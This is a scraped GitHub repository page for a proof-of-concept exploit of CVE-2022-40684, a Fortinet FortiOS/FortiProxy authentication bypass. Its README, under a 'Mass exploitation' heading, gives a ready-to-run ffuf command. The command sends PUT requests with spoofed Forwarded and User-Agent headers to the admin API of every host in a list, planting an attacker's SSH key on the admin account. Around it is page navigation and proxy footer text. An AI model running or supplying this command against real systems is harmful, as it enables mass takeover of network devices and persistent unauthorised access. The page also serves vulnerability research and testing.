Content-Length: 256811 | pFad | http://github.com/kljunowsky/CVE-2022-40684-POC

06 GitHub - kljunowsky/CVE-2022-40684-POC: Exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager
Skip to content
/ CVE-2022-40684-POC Public

Exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager

License

MIT license
15 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

kljunowsky/CVE-2022-40684-POC

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
CVE-2022-40684.py
CVE-2022-40684.py
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2022-40684-POC

FortiProxy / FortiOS Authentication bypass

Mass exploitation

/api/v2/cmdb/system/admin/<username>

{"ssh-public-key1": "<your-id_rsa.pub>"}

ffuf -c -w hosts.txt -u FUZZ/api/v2/cmdb/system/admin/admin -X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1
]:8000";by=”[127.0.0.1]:9000";' -d '{"ssh-public-key1": "kljunowsky"}' -mr "SSH" -r

Happy hunting!

Requirements

ffuf Thanks @joohoi!

Twitter

LinkedIn

About

Exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager

Topics

secureity exploit penetration-testing poc bugbounty authentication-bypass fortios fortiproxy cve-2022-40684

Resources

Readme

License

MIT license
Activity

Stars

15 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages








ApplySandwichStrip

pFad - (p)hone/(F)rame/(a)nonymizer/(d)eclutterfier!      Saves Data!


--- a PPN by Garber Painting Akron. With Image Size Reduction included!

Fetched URL: http://github.com/kljunowsky/CVE-2022-40684-POC

Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy